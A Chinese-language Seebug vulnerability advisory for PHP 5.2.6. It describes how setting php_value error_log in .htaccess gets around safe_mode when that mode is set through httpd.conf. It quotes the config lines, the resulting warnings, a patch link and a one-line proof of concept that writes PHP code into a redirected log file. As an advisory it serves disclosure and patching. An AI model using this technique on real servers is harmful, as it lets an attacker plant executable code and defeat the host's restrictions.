PHP error_log绕过安全模式限制漏洞

2008-11-21T00:00:00
ID SSV:4482
Type seebug
Reporter Root
Modified 2008-11-21T00:00:00

Description

BUGTRAQ ID: 32383

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

在以全局模式使用safe_mode时:

php.ini­: safe_mode = On

并通过php_admin_flag声明:

<Directory "/www"> ... php_admin_flag safe_mode On </Directory>

当在/www/中创建一些php脚本并试图调用:

ini_set("error_log", "/hack/");

或在/www/.htaccess中

php_value error_log "/hack/bleh.php"

结果是:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not \ allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script \ whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php \ on line 4

这是由于php.ini中声明了safe_mode。但如果在httpd.conf使用:

php_admin_flag safe_mode On

就仅会得到:

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script \ whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php \ on line 4

.htaccess中允许php_value error_log "/hack/blehx.php"句法,导致绕过safe_mode的限制。

PHP 5.2.6 PHP


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup target=_blank>http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup</a>

                                        
                                            
                                                error_log(&quot;&lt;?php phpinfo(); ?&gt;&quot;, 0);